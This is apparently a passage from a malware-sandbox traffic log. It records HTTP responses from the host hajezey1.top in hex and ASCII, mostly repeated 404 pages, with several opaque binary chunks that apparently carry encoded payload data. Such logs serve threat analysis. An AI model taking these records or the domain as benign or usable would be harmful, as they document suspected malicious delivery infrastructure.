2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:04 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:04 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:05 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 22 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b 93 e2 86 38 f8 f3 a4 7c 1d 16 4d aa 8f 8c f5 cf 9b 2b 25 9b f6 ba e9 1a b0 1c 07 74 d2 87 9a 87 cd 2b 80 78 51 a1 a2 8f 3c 65 dd 1c e0 32 02 50 08 a8 da e2 30 a5 59 93 9b b7 4f f3 e0 e6 62 79 04 54 ea d6 d7 0c 3d 61 1d 27 f4 d2 af 34 91 b4 b9 21 80 20 59 55 11 5c 92 86 64 ab 49 11 80 c8 58 4b 67 13 d2 18 5b 47 86 65 39 15 32 29 c5 f7 15 67 aa cf 20 c0 7a 9f 06 a2 7f c1 96 98 8b 36 85 92 c9 8a 5c d8 06 0e 45 27 11 7d 87 f8 e0 04 89 f9 d4 57 80 90 70 89 ec 9c 48 6b 0e e1 a2 22 48 f2 d0 49 a1 ff bc ff 1f fd f5 3f f4 6f d3 7c cb 36 d2 ce 4e 49 b3 0b 5b 4c 65 55 5b ad 30 7a 83 3b 2b ca c3 e3 b2 ec 92 90 0f 1c 57 ee 87 7e 0c 35 8a 3d 50 7f d0 56 81 b6 9b 97 96 70 9f 8a 86 e8 47 5a ad b2 cb 99 6c 71 11 87 02 b1 b8 56 b0 40 f6 0a bf 8b 71 91 ce 21 b5 1e 55 df 76 79 d3 4f 5a 96 da 19 d1 3a 2d ca 41 06 02 25 47 c2 fa 6b 8a b2 e2 4b 6d ec c0 40 a4 e2 d0 d7 d9 86 4e 85 8b 51 b0 3e 5b f3 99 84 4a 04 38 8d 7d 14 2c d0 e8 b1 14 1d 73 10 22 17 4a 86 47 30 5a 22 a2 3f 0b 8e 6b 51 fd b5 54 02 f9 ee f8 b2 d6 4a 1f a7 e9 4d 51 02 43 64 cd 25 5c 8d b7 d7 21 0c 26 17 51 d2 eb e9 23 19 9d 46 3c 70 76 41 ae a6 c3 88 3e 9d 43 dd 17 fe 2f 43 9e f8 d8 62 47 42 f5 6a b7 be 34 56 9b 46 76 99 86 11 00 83 32 42 ea 6f cf ae 04 5d 94 36 e1 48 50 67 35 50 b8 81 be f0 80 de 5b 46 6a 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ec f8 b9 5f 14 2c f2 e6 2f bd 44 ef bf 8b 4f dc ea 90 39 02 97 ab a4 
57 25 f5 b8 d0 a7 85 62 4a 52 7d 54 7a 08 6c 39 c0 5e f3 5c 19 6d 63 95 be 07 3d da 9a 3e 05 22 7d e6 b2 68 60 bd 10 31 eb cd fc 25 15 8e b7 82 7f 8e 40 b6 f1 47 4e a1 21 84 88 4b 2e 69 81 77 af dd c6 83 41 df 30 ae b8 e8 21 10 a0 57 6e 61 87 bd 77 6a 67 09 0f 8a ef 22 3b 6b 81 c7 86 7a 8e 52 d3 e4 9e 4e 7b d6 7d 00 2c 0f 7a d7 9b 48 0b ad 8b bc 08 85 f7 8f 82 42 b7 28 85 d8 da 14 79 a2 8e b9 08 c0 fe 77 c6 1d 2b 15 bf fa a5 e9 a8 b2 13 3b 35 02 1a 1b eb c2 f5 6c 8d e3 17 d3 83 6f ce ed 3f ec cf 81 68 73 02 99 ea a6 f5 c3 05 d0 b3 d3 23 39 41 c4 a5 c8 63 77 ca 0b 8f bd d9 39 6b a1 99 98 77 e8 0f 4e 8c da 06 bd 37 87 8c b4 26 b8 2c 58 b2 77 6c 08 d8 f9 d2 eb 48 25 66 34 2d 6f 77 5e a5 37 48 84 99 ff 67 37 f9 ad a1 97 3b 86 f3 3d 98 bb 1f 67 c7 26 e1 39 c6 86 8e f0 09 af 63 9b 09 09 a8 00 13 30 7b 88 cc c9 e1 a3 c3 e5 0f 25 93 23 c4 a9 d7 cf 8e 3d 39 dc 46 ba 58 dc be b0 98 3f d8 94 eb 53 43 a1 0c 97 e4 6e 76 f9 14 34 0b 64 82 b2 64 4f 55 e0 ca 5e c3 bd c0 88 0b 54 d9 1d 69 7a de ff 3d e1 03 70 2e 1f f4 d4 6a a9 a9 16 da
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:06 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 52 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b f7 79 8d fb c4 4d c2 ec 5d 4f 5f 5b ff 33 90 5f 84 e2 eb 0b 4a 05 8e 8b a4 d4 ac e4 80 54 fd 17 d2 ea 4f e8 a1 1e c7 1f ab 29 29 8c 97 ad 67 c0 78 b7 bc 72 3f 1a 7c 03 84 5e 85 63 91 5b 07 e9 1f 9d 15 46 a6 b3 58 f1 06 ee 0c 42 de 8b f4 24 eb a8 e1 48 29 e8 74 cc 7c 3b 66 ab 4b 11 c0 4d 58 4b 77 13 d2 08 5b 47 86 65 29 15 32 39 c5 f7 45 22 aa cf 7c c1 7f 9f 61 79 b7 9e 96 98 8b 36 19 19 cb 8a f3 d8 04 0f 4e 86 19 7d 6f 37 e3 04 89 3d a4 55 80 90 70 89 9c 2c 4b 6b b6 e2 a2 22 48 d2 d1 49 ad ff fc ff 1f ed f5 3f f4 6d d3 7c ce 36 d3 ce 4e 49 b3 0b 5e 4c 64 55 5b ad 30 7a 83 eb 5f c8 c3 e7 b2 ec 24 1a 0a 1c 55 ee 87 fe 0c 35 9a 3d 50 6f d0 56 81 96 8b 97 9e 60 9f 8a 86 e8 47 5a bd b2 cb 99 64 51 11 87 4a b1 b8 56 54 8c f5 0a ef 8b 71 91 e0 35 a3 64 49 e0 76 79 27 24 58 96 da 39 d1 3a 2d a6 43 06 02 27 47 c2 fa cb f9 b0 72 50 6d ec f0 52 a4 e2 ec d7 d9 e6 60 f7 f8 23 d3 3e 5b f3 71 81 4a 04 38 2d 7f 14 2c d6 e8 b1 14 73 71 10 d2 ab 4b 86 07 30 5a 22 a2 3f 0b 8e 2b 51 fd f5 7a 60 9c 82 4b d0 d6 4a 13 a7 e9 4d 51 c2 41 64 cd 27 5c 8d b7 a3 23 0c 26 17 51 d2 eb e9 23 19 b3 32 59 08 42 41 ae e4 e3 40 3d 9d 43 cd 17 fe 2f 89 9d f8 d8 66 47 42 25 e1 b5 be 34 56 9b 46 3e 99 86 11 22 83 37 22 ec 7e af da 11 4b 95 36 2a 21 3f 65 74 b0 bb 87 f6 aa 81 de bb a0 69 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ac f8 b9 9f 3a 48 93 9f 4e bd 44 ef 5a 89 4f dc ea c0 4a 00 97 af a4 
57 25 11 bb d0 ea 85 62 4a 08 7d 54 7a 98 6c 39 c0 1e f3 5c d9 40 11 e6 cc 64 3d da 9a 56 3a 22 7d e6 d2 1b 62 b9 50 31 eb cd 14 26 15 8e b7 82 7f 8e 40 b6 f1 b8 4e a1 21 3b 88 4b 6e 47 f3 12 c3 b2 a5 83 41 ab 13 af b8 e8 81 63 a2 57 4a 60 87 bd 5f 6e 67 09 0f 8a ef 22 3b 6b 81 c7 86 7a 8e 12 d3 e4 dc 0e 7b d6 7d 00 2c 0f 7a d7 9b 48 0b ad 8b bc 08 85 f7 8f 82 42 b7 28 85 d8 da 14 79 a2 8e b9 08 c0 fe 77 c6 1d 2b 15 bf fa a5 e9 a8 b2 13 3b 35 02 1a 1b eb c2 f5 6c 8d e3 17 d3 83 6f ce ed 3f ec cf 81 68 73 02 99 ea a6 f5 c3 05 d0 b3 d3 23 39 41 c4 a5 c8 63 77 ca 0b 8f bd d9 39 6b a1 99 98 77 e8 0f 4e 8c da 06 bd 37 87 8c b4 26 b8 2c 58 b2 77 6c 08 d8 f9 d2 eb 48 25 66 34 2d 6f 77 5e a5 37 48 84 99 ff 67 37 f9 ad a1 97 3b 86 f3 bd 98 bb 1f 67 c7 26 e1 39 c6 86 8e f0 09 af 63 95 09 09 a8 1f 13 30 7b 32 cc c9 e1 ad c3 e5 0f 25 93 23 c4 1d d7 cf 8e 34 39 dc 46 77 58 dc be 91 98 3f d8 2c eb 53 43 a0 0c 97 e4 22 76 f9 14 f9 0b 64 82 93 64 4f 55 b4 ca 5e c3 d5 c0 88 0b 3d d9 1d 69 09 de ff 3d c1 03 70 2e 6f f4 d4 6a db a9 16 da
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:10 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:10 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 39 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d2 9e 55 06 63 17 e5 ff dc fc be 1e b4 53 d9 63 ba 53 11 91 1d f4 0d 0a 30 0d 0a 0d 0a Data Ascii: 29I:82OUcScS0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:50:13 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 